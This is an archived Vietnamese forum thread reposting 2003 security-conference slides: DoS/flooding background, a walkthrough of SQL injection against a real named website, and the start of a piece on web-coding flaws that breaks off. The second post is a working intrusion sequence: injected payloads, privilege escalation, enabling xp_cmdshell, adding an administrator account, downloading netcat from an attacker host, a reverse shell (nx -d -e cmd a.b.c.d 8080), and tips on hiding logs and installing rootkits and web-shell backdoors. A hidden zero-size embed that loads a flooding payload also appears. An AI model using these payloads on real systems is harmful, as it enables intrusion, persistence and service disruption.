PDA

View Full Version : Một Số Bài Viết Từ Hội Thảo An Ninh Mạng Vn


admin
03-10-2003, 03:58 PM
Các bài viết này cũng có trên www.vnn.vn, nhưng admin tôi cứ mang về đây cho chắc ăn, sợ mấy hôm nữa mấy bài này sẽ bị xoá. Anh em Tin học Lam Sơn nên dành thời gian nghiên cứu một chút các bài này, theo tôi là khá hay. Có một số đoạn chưa được hoàn tất, chúng ta sẽ bổ xung sau. :P Chúc vui vẻ.

PHƯƠNG PHÁP PHÒNG CHỐNG FLOOD - DOS (Bé yêu)
10:49', 3/10/ 2003 (GMT+7)
DDOS - tributed Denial Of Service ?



• 1998 Chương trình Trinoo tributed Denial of Service (DDoS) được viết bởi Phifli.

• Tháng 5 – 1999 Trang chủ của FBI đã ngừng họat động vì cuộc tấn công bằng (DDOS)

• Tháng 6 – 1999 Mạng Trinoo đã được cài đặt và kiểm tra trên hơn 2000 hệ thống.



DDOS – tributed Denial Of Service ?



• Cuối tháng 8 đầu tháng 9 năm 1999, Tribal Flood Network đầu tiiên ra đời, Chương trình được Mixter Phát triển.

• Cuối tháng 9 năm 1999, Công cụ Stacheldraht đã bắt đầu xuất hiện trên những hệ thống của Châu âu và Hoa kỳ.

• Ngày 21 tháng 10 năm 1999 David Dittrich thuộc trường đại học Washington đã làm những phân tích về công cụ tấn công từ chối dịch vụ



DDOS - tributed Denial Of Service ?



• Ngày 21 tháng 12 năm 1999 Mixter phát hành Tribe Flood Network 2000 ( TFN2K ).

• 10 : 30 / 7 – 2 -2000 Yahoo! ( Một trung tâm nổi tiếng ) đã bị tấn công từ chối dịch vụ và ngưng trệ hoạt động trong vòng 3 giờ đồng hồ. Web site Mail Yahoo và GeoCities đã bị tấn công từ 50 địa chỉ IP khác nhau với nhửng yêu cầu chuyễn vận lên đến 1 gigabit /s.



DDOS - tributed Denial Of Service ?



• 8 -2 nhiều Web site lớn như Buy.com, Amazon.com, eBay, Datek, MSN, và CNN.com bị tấn công từ chối dịch vụ.

• Lúc 7 giờ tối ngày 9-2/2000 Website Excite.com là cái đích của một vụ tấn công từ chối dịch vụ, dữ liệu được luân chuyễn tới tấp trong vòng 1 giờ cho đến khi kết thúc, và gói dữ liệu đó đã hư hỏng nặng.



DDOS - tributed Denial Of Service?



• Qua đó ta có thể thấy rõ những vụ tấn công từ chối dịch vụ (Denial Of Services Attack ) và những cuộc tấn công về việc gửi nhửng gói dữ liệu tới máy chủ (Flood Data Of Services Attack) tới tấp là những mối lo sợ cho nhiều mạng máy tính lớn và nhỏ hiện nay,



DDOS - tributed Denial Of Service?



• Khi một mạng máy tính bị Hacker tấn công nó sẽ chiếm một lượng lớn tài nguyên trên server như dung lượng ổ cứng, bộ nhớ, CPU, băng thông …. Lượng tài nguyên này tùy thuộc vào khả năng huy động tấn công của mỗi Hacker. Khi đó Server sẽ không thể đáp ứng hết những yêu cầu từ những client của những người sử dụng và từ đó server có thể sẽ nhanh chóng bị ngừng hoạt động, crash hoặc reboot.



DDOS - tributed Denial Of Service?



• Tấn công từ chối dịch vụ có rất nhiều dạng như Ping of Death, Teardrop, Aland Attack, Winnuke, Smurf Attack, UDP/ICMP Flooding, TCP/SYN Flooding, Attack DNS.



DDOS - tributed Denial Of Service?

• Ping Of Death.
Một số máy tính sẽ bị ngưng họat động, Reboot hoặc bị crash khi bị nhận những gói dữ liệu ping có kích thước lớn.

• Ví dụ như : ping địachỉ -n 1000
trong đó : số 1000 là số lần gửi gói dữ liệu.

• TCP/SYN Flooding:
Bước 1: Khách hàng gửi một TCP SYN packet đến cổng dịch vụ của máy chủ
Khách hàng =è SYN Packet ===è Máy chủ



DDOS - tributed Denial Of Service?



• Bước 2 : Máy chủ sẽ phản hồi lại khách hàng bằng 1 SYN/ACK Packet và chờ nhận một 1 ACK packet từ khách hàng

Máy chủ è SYN/ACK Packet è Khách hàng

• Bước 3: Khách hàng phản hồi lại Máy chủ bằng một ACK Packet và việc kết nối hòan tất Khách hàng và máy chủ thực hiện công việc trao đổi dữ liệu với nhau.

Khách hàng è ACK Packet è Máy chủ



DDOS - tributed Denial Of Service?



• Trong trường hợp Hacker thực hiện việc SYN Flooding bằng cách gửi tới tấp, hàng loạt TCP SYN packet đến cổng dịch vụ của máy chủ sẽ làm máy chủ bị quá tải và không còn khả năng đáp ứng được nữa.



DDOS - tributed Denial Of Service?



• UDP/ICMP Flooding:
Hacker thực hiện bằng cách gửi 1 số lượng lớn các gói tin UDP/ICMP có kích thước lớn đến hệ thống mạng, khi hệ thống mạng chịu phải sự tấn công này sẽ bị qua tải và chiếm hết băng thông đường truyền đi ra bên ngòai của mạng này, vì thế nó gây ra nhửng ảnh hưởng rất lớn đến đường truyền cũng như tốc độ của mạng, gây nên những khó khăn cho khách hàng khi truy cập từ bên ngoài vào mạng này.



DDOS - tributed Denial Of Service?



• Những điều kiện đủ để có những cuộc tấn công DoS Có hiệu quả:
Để có được những cuộc tấn công DOS có hiệu quả thông thường một Hacker phải lựa chọn cho mình những đường truyền có dung lượng lớn cũng như tốc độ máy được dùng làm công cụ tấn công. Nếu không hội tụ được những điều kiện trên thì cuộc tấn công sẽ không mang lại mấy khả quan.



DDOS - tributed Denial Of Service?



• Nhưng với những tiện ích như Trinoo, TFN2K, Stacheldraht… người tấn công không phải chỉ dùng 1 nơi để tấn công mà sử dụng nhiều mạng lưới khác nhau để thực hiện việc tấn công đồng lọat. Các máy được dùng để tấn công thường là các máy có kết nối Internet bị người tấn công xâm nhập.



DDOS - tributed Denial Of Service?



• Qua đó chúng tôi đã tham khảo và biết một số cách nhưng hầu hết không chống được một cách triệt để.
1> Khi bạn phát hiện máy chủ mình bị tấn công hãy nhanh chóng truy tìm địa chỉ IP đó và cấm không cho gửi dữ liệu đến máy chủ.
2> Dùng tính năng lọc dữ liệu của router/firewall để loại bỏ các packet không mong muốn, giảm lượng lưu thông trên mạng và tải của máy chủ.



DDOS - tributed Denial Of Service?



• 3> Sử dụng các tính năng cho phép đặt rate limit trên router/firewall để hạn chế số lượng packet vào hệ thống.

• 4> Nếu bị tấn công do lỗi của phần mềm hay thiết bị thì nhanh chóng cập nhật các bản sửa lỗi cho hệ thống đó hoặc thay thế.

• 5> Dùng một số cơ chế, công cụ, phần mềm để chống lại TCP SYN Flooding.



DDOS - tributed Denial Of Service?



• 6> Tắt các dịch vụ khác nếu có trên máy chủ để giảm tải và có thể đáp ứng tốt hơn. Nếu được có thể nâng cấp các thiết bị phần cứng để nâng cao khả năng đáp ứng của hệ thống hay sử dụng thêm các máy chủ cùng tính năng khác để phân chia tải.

• 7> Tạm thời chuyển máy chủ sang một địa chỉ khác.



Flooding Data Attack ?



• Hoàn toàn khác với DDos về khả năng tấn công cũng như sự huy động tấn công rất dễ dàng để làm tràn ngập dữ liệu (Flood data attack !) được phát triển ở rất nhiều dạng nó dựa vào những lỗi của hầu hết các mã ngờ uồn mở của ASP, PHP, JSP, CGI …..



Flooding Data Attack ?



• Với DDOS như chúng ta đã biết khi một số Hacker muốn mở những cuộc tấn công đều phải hội tụ những điều kiện, là phải dùng những máy chủ có đường truyền cao và thường thì phải Hack vào server đó mới có thể huy động làm công cụ tấn công được, ngược lại với Flood data attack việc huy động quá dễ, nó chia ra làm 2 dạng tấn công như sau:



Flooding Data Attack ?



• Dạng 1: Được chạy trên trên môi trường Windonw, Unix, Linux …

• Dạng 2: Được đính kèm trên các Website và nhận lệnh tấn công từ một địa chỉ nào đó trên Mạng toàn cầu.



Flooding Data Attack ?

• Dạng 1.
Với kích thước từ 500 byte đến 1Kb các Hacker dễ dàng đính kèm vào một Website nào đó có nhiều người hiện đang có mặt truy cập trên Website đó.



Flooding Data Attack ?

• <embed src=“http://noitancong.com/flooddata.swf" width="0" height="0"></embed>
với đọan mã trên ta có thể thấy Hacker đã đặt kích thước tập tin Flooddata.swf ở chế độ Chiều rộng (width) là bằng 0 và chiều cao (height) cũng bằng 0 như thế tập tin này sẽ không thể hiển thị được trên trên trang Web đó



Flooding Data Attack ?

Khi người sử dụng vào Website này lập tức sẽ kích họat chương trình Flood Data Attack ! của Hacker tại địa chỉ là http://noitancong.com/filedata.swf và Hacker cũng dễ dàng điều khiển chương trình bằng 1 file ngờ uồn ở 1 Website nào đó của Hacker trên mạng mà Hacker đó đặt ra trong chương trình Flooding data Attack.



Flooding Data Attack ?

• Hacker có thể kiểm soát được số người hiện đang kích hoạt chương trình Flood data của mình trên Website đó và khi nào Hacker cảm thấy số lượng người đang kích hoạt chương trình đã đủ để việc tấn công một Website nào đó trên mạng thành công thì công việc đó có thể được bắt đầu.



Flooding Data Attack ?

• Ví dụ như hacker vào một địa chỉ như http://www.vbuleetin.com để thực hiện công việc tấn công trang này hacker cần phải tìm những nơi có sự trao đổi dữ liệu cho nhau như Register, Search, Login, Sendmail ….. Sau khi đã thu thập được những thành phần trên Hacker bắt đầu thực hiện lấy nhửng đầu vào(input) và gán nhửng giá trị đầu vào trên lên nơi điều khiển của chương trình Flood data attack!.



Flooding Data Attack ?



Ví dụ phần trên sẽ được gán với biến như sau :










Flooding Data Attack ?



• Url=http://www.vbuleetin.com/register.php&username=user+random(999999999)&password=flood&passwordconfim=password&email=random(100000000)+@vbulleetin.com
Trong đó Url là giá trị của Website bị tấn công, Username với giá trị là một user nào đó do hacker đặt ra và cộng với biến ngẫu nhiên ở sau mỗi user mà hacker đặt ra là khác nhau.



Flooding Data Attack ?



• Một khi Website này bị tấn công, toàn bộ họat động của Server chứa Website đó sẽ bị hậu quả rất ngiêm trọng tùy theo số lượng người kích họat vào chương trình Flood data attack! Của hacker đó, Lúc này những phần bị ảnh hưởng sẽ là MailServer, MySQL, PHP, Apache, FTP….



Flooding Data Attack ?



• Đối với MySQL : Khi bị Flood data attack! Những yêu cầu sẽ được gửi liên tục đến Server và được chuyển qua MySQL xử lý với số lượng lớn và nối tiếp nhau cho đến khi quá tải chương trình MySQL sẽ hòan toàn bị vô tác dụng song song với việc ảnh hưởng đến MySQL là việc ảnh hưởng đến MailServer.



Flooding Data Attack ?



Với giá trị là random(100000000)+@vbuleetin.com thì khi thực thi nó sẽ gửi từ ‘1@vbuleetin.com’ cho đến ‘100000000@vbuleetin.com’ tất nhiên nhửng email này sẽ không có thực đối với trang chủ của Website ‘http://www. vbuleetin.com.



Flooding Data Attack ?



• Đối với sẽ nhửng địa chỉ email này MailServer đưa vào danh sách “Msgs Failed” nhưng với giá trị là @vbulletin.com thì hầu hết một nhà cung cấp “domain” và “hosting” sẽ chuyển về một số email mặc định như là postmaster, admin, administrator, supervisor, hostmaster, webmaster.



Flooding Data Attack ?



Những Hacker có thể lợi dụng những Form mail trong việc trao đổi thông tin giữa khách hàng với chủ cung cấp dịch vụ để thực hiện những cuộc tấn công, những cuốc tấn công này thường rất nguy hiễm vì có thể trong 1 giây Hacker thực hiện từ 100 lần đến hàng nghìn lần với những yêu cầu SendEmail từ 1 user trên server đó đến MailServer.



Flooding Data Attack ?



• Dạng 2: Được chạy dưới dạng file.exe với dạng thức này thì khả năng tấn công vẫn giống như cách tấn công nằm trên website nhưng khả năng tấn công được nâng thêm nhiều dạng như Ping, Flood Ftp, Flood Smtp… tùy vào khả năng phát triển của Hacker.



Flooding Data Attack ?



Cũng giống như chương trình Flood data attack! Được gắn trên website dạng .exe này cũng được điều khiển từ 1 Website. Thường thì nơi điều khiển được đặt chung 1 nơi để tiện cho việc điều khiển.



Flooding Data Attack ?



Với những phương thức tấn công như vậy ta cũng có thể thấy được tầm nguy hiểm của nó nếu như được đặt trên một server với số lượng người truy cập đông như Google hoặc 1 Website nổi tiếng nào đó thì sức phá hoại của nó là rất khủng khiếp.









Flooding Data Attack ?



• Với 1 client/1s có thể gửi từ 3 – 8 yêu cầu có thực đến máy chủ thực thi và xử lý thông qua đó nó có thể ảnh hưởng đến Php, Apache, Phpmail, MySQL, FTP …., Tùy theo những mã ngờ uồn của ASP, PHP, JSP, CGI, PL hoặc chung quy là những mã ngờ uồn có liên quan đến công việc xuất và nhập dữ liệu.



Flooding Data Attack ?



Nếu hacker huy động hoặc hack được những server hoặc Website nào đó có số lượng người Online khoảng 2000 thì trong 1 giây Server đó sẽ phải thực thi khoảng 6000 yêu cầu từ các client gửi đến Server đó.



Flooding Data Attack ?



Ví dụ : Có User nằm trên server X nào đó user đó có cài đặt mã ngờ uồn mở như Forum IPB (Invision Power Boards) khi hacker sử dụng mục đăng ký làm nơi tấn công Flood data thì trong vòng một giây như phần trên đã nêu sẽ có khoãng 6000 nickname được khởi tạo đi kèm theo đó là 6000 yêu cầu đã được mã ngờ uồn mử thiết lập khi đăng ký và sẽ kèm theo việc gửi email đến các địa chỉ đã đăng ký.



Flooding Data Attack ?



• Như vậy đi kèm với 6000 nickname trên, MailServer sẽ phải gửi đi 6000 yêu cầu trong vòng 1/s việc này nếu như bị kéo dài từ 5 – 10 phút thì Server đó hầu như sẽ không còn họat động được.



Flooding Data Attack ?



Bandwith lúc này có thể tăng 5 – 10 MB/s cộng thêm data khi được chuyển đến MySQL lúc này có thể đạt tới 5 -7 MB/s nữa khi đó toàn bộ các phần mềm như Apache, MailServer, PHP, MySQL, FTP đều bị ngưng họat động. Lúc đó server có thể sẽ bị reboot.



Flooding Data Attack ?



Vì Hacker sử dụng phương tiện tấn công Online trên Website và dựa vào lượng khách truy cập thông tin ở nhiều Website nên phương pháp này hầu như rất khó chống, mỗi ngày Hacker có thể dùng hàng ngàn địa chỉ IP trên khắp thế giới để thực hiện việc tấn công như thế ta có thể thấy nó đơn giản so với DDos rất nhiều nhưng sự nguy hiểm có lẽ hơn hẳn DDos.



Anti Flooding Data Attack ?



• Vì Flooding Data Attack tấn công theo dạng địa chỉ ‘http://victim.com/data.php&bien1&bien2&bien3’ theo cổng GET hoặc POST vì vậy, cho dù bất cứ lý do gì khi tấn công cũng phải đi qua hướng này.



Anti Flooding Data Attack ?



Do lỗi được xuất hiện ở các mã ngờ uốn ASP hay PHP nên cách tốt nhất là sửa và xem lại những mã ngờ uồn mà người sử dụng muốn đưa lên mạng.



Anti Flooding Data Attack ?



Để tránh bị Flood data Attack! Thì cách phòng chống tạm thời vẫn là thêm một chuỗi ngẫu nhiên trên mỗi Form có sự xuất và nhập dữ liệu tuy nhiên những cách trên chưa phải là những cách hòan thiện để chống lại nhửng cuộc tấn công tràn ngập dữ liệu (Flooding Data Attack).

admin
03-10-2003, 03:59 PM
XÂM NHẬP MÁY CHỦ MS-SQL QUA LỖI SQL-INJECTION & CROSS-DATABASE
10:55', 3/10/ 2003 (GMT+7)
PHẦN I: CÁC KĨ THUẬT HACK
TRONG SQL
• sql-injection
• convert-magic
• cross-database
PHÁT HIỆN LỖI SQL-INJECTION


http://www.company.com/product/price.asp?id=1
select price from product where id=1
http://www.company.com/product/price.asp?id=1’
select price from product where id=1’
Unclosed quotation mark before the character string ‘
http://www.company.com/product/price.asp?id=[...]


KĨ THUẬT CONVERT-MAGIC


http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version) --sp_password
select price from product where id=1 and 1=convert(int,@@version)--sp_password


KĨ THUẬT CONVERT-MAGIC


Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright &copy; 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3)' to a column of data type int.


KĨ THUẬT CONVERT-MAGIC


'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
• @@servername, db_name(), system_user, ...
• ‘ “ ( )
LỖI CROSS-DATABASE CỦA MS-SQL
use testdatabase
create proc dbo.test as select * from master.dbo.sysxlogins
go
exec test
select * from master.dbo.sysxlogins
• sa == dbo
• db_owner có thể create & design các object của dbo
• SID của proc dbo.test == SID của master.dbo.sysxlogins


LỖI INJECTION CỦA MASTER..SP_MSDROPRETRY


CREATE PROCEDURE sp_MSdropretry
(@tname sysname, @pname sysname)
as
declare @retcode int
/*
** To public
*/
exec ('drop table ' + @tname)
if @@ERROR <> 0 return(1)
exec ('drop procedure ' + @pname)
if @@ERROR <> 0 return(1)
return (0)


NÂNG QUYỀN QUA MASTER..SP_MSDROPRETRY


exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers'
exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx'
exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx'
exec sp_executesql N'drop view dbo.test‘
drop table xx update sysusers set sid=0x01 where name='dbo' drop procedure xx
drop table xx update dbo.test set sid=0x01,roles=0x01 where name=guest drop table xx
• guest == db_owner của database master


PHẦN 2: MINH HỌA HACK SQL


• Khai thác lỗi sql-injection tại nhaxinh.com.vn
• Một số kinh nghiệm khi hack SQL


LỖI SQL-INJECTION TẠI NHAXINH.COM.VN


• dùng “proxy.ia2.marketscore.com:80” ðể tránh bị ghi nhật kí
http://www.nhaxinh.com.vn/FullStory.asp?id=1
http://www.nhaxinh.com.vn/FullStory.asp?id=1’


LỖI SQL-INJECTION TẠI NHAXINH.COM.VN


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\


XÁC ĐỊNH VERSION


http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]


XÁC ĐỊNH VERSION


[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright &copy; 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840


XÁC ĐỊNH SERVER_NAME


http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH DATABASE_NAME


http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
XÁC ĐỊNH USER_NAME


http://www.nhaxinh.com.vn/FullStory.asp?
id=1 and 1=convert(int,system_user)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
• user_name(): các member của “sysadmin” được map sang “dbo”


XÁC ĐỊNH MỨC QUYỀN CỦA SQL SERVER


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
• admin đã able openrowset/sqloledb, sẽ enable lại sau


ĐƯA GUEST VÀO DB_OWNER CỦA DATABASE MASTER1


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
• Tại sao? guest là db_owner của database master nên guest có thể thi hành xp_regwrite hoặc xp_cmdshell


XÁC NHẬN GUEST ĐÃ NẰM TRONG DB_OWNER CỦA DATABASE MASTER CHƯA ?


http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in('dbo')))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'guest' to a column of data type int.
/Including/general.asp, line 840


CÀI CỬA SAU “BUILTIN\ADMINISTRATORS”


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
• login vào database với username là “BUILTIN\ADMINISTRATORS” mà không cần password


TẠI SAO KHÔNG ADD THẲNG USER “NHAXINH” VÀO SYSADMIN?


exec master..sp_addsrvrolemember 'nhaxinh',sysadmin
• Lỗi: Invalid object name ‘XXXX’ khi vấn tin CSDL sau này


ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','AllowInProcess',REG_DWOR D,1 exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB','allowAdhocAccess',REG_DWO RD,0—


ENABLE OPENROWSET/OLEDB & XÁC ĐỊNH LẠI MỨC QUYỀN CỦA SQL SERVER


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840


ABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'—


ABLE FIREWALL CỦA NT & TẮT LOG TRONG SQL


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'—


LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=' , 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')—


LỖI KHI ENABLE MASTER..XP_CMDSHELL & “ALLOW UPDATES”


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840


THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=' , 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
• set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins,...) trực tiếp, không qua các “system-procedure”


CHÚ Ý KHI CHẠY MASTER..XP_CMDSHELL


• exec master..xp_cmdshell ‘dir c:\’ -- “SQLAgentCmdExec”
• select * from openrowset('sqloledb', 'server=<SERVER_NAME>;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "dir c:\"') -- “NT AUTHORITY\SYSTEM”


XÁC ĐỊNH IP CỦA SERVER


http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == “%”)

XÁC ĐỊNH IP CỦA SERVER


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840


DO THÁM IP “203.162.7.70”


C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
• 203.162.7.70 == panvietnam.com


FTP TRỰC TIẾP - THẤT BẠI !


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=' , 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == “&”)


FTP TRỰC TIẾP - THẤT BẠI !


C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye


UPLOAD NETCAT LÊN SERVER


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=' , 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == “>”)


UPLOAD NETCAT LÊN SERVER


echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f


THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?


http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))—


THẨM TRA XEM NETCAT ĐẴ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840


NỐI NETCAT NGHỊCH CHUYỂN RA NGOÀI


http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=' , 'set fmtonly off select 1 exec xp_cmdshell "nx -d -e cmd a.b.c.d 8080"')--
C:\WINNT.SBS\system32>nx -vv -l -p 8080
listening on [any] 8080 ...


NỐI NETCAT NGHỊCH CHUYỂN RA NGOÀI


203.162.7.70: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [a.b.c.d] from (UNKNOWN) [203.162.7.70] 3343: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
&copy; Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>_


NÊN CÀI CỬA SAU NÀO CHO SHELL ?


• Hacker Defender - http://rootkit.host.sk
• TYT - http://www.nhomvicki.net/tmp/tyt0.zip
• yyt_hac's ntrootkit - http://www.yythac.com
• WinShell - http://www.janker.org
• ... (http://www.ttian.net)


NÊN CÀI CỬA SAU NÀO CHO WEB ?


• 4in1.asp - http://www.nhomvicki.net/tmp/4in1.asp
• ntaddy.asp
C:\> net localgroup administrators IWAM_UNESCO /add
The command completed successfully.
C:\> iisreset
Attempting stop...
Internet services successfully stopped
Attempting start...
Internet services successfully restarted
(IIS bây giờ sẽ chạy với mức quyền Administrators)


LỜI KHUYÊN CHO ADMIN CỦA NETNAM.VN


• Thiết lập tường lửa mạnh cho NT
• Dùng chương trình “fport.exe” để phát hiện cửa sau
• Ðắp bản patch mới nhất cho MS-SQL
• Hiệu chỉnh file “%SystemRoot%\Help\iisHelp\common\500-100.asp”
• Sửa lỗi cho các file .asp bị dính sql-injection
• Xem nhật kí của IIS định kì


XIN CẢM ƠN

admin
03-10-2003, 04:01 PM
Bảo mật trong lập trình Web (Babylearnhack)
10:16', 3/10/ 2003 (GMT+7)



Một số lỗi cơ bản trong lập trình Web




Một số lỗi lập trình

cơ bản







Files Khai báo và xử SQL Injection

lý biến









Lỗi trong xử lý Files


•Lỗi trong xử lý file chúng ta thường gặp trong lập trình PHP, ASP , CGI , v…v…

•Lỗi này gây ra do lập trình viên đã sơ ý trong việc sử dụng các hàm xử lý file như : include(),require(),require_one(),fopen(), Execute , v…v….





Lỗi trong xử lý Files


•Các hacker có thể sử dụng lỗi này để xâm nhập vào các server để ăn cắp thông tin , deface v..v… và còn có thể cướp quyền quản lý server…

•Đây là lỗi khá nghiêm trọng vì vậy khi lập trình chúng ta phải cẩn thận để không mắc lỗi này.





Lỗi trong xử lý Files
• Trong PHP , một số hàm như include , require , v…v… cho phép hacker có thể chạy script ở một server khác ( remote files ) để tấn công trực tiếp vào website hoặc server của bạn.


Lỗi trong xử lý Files
Ví dụ :
Trong IBF 1.1 bị lỗi xử lý file ở ad_member.php
===== ad_member.php =====
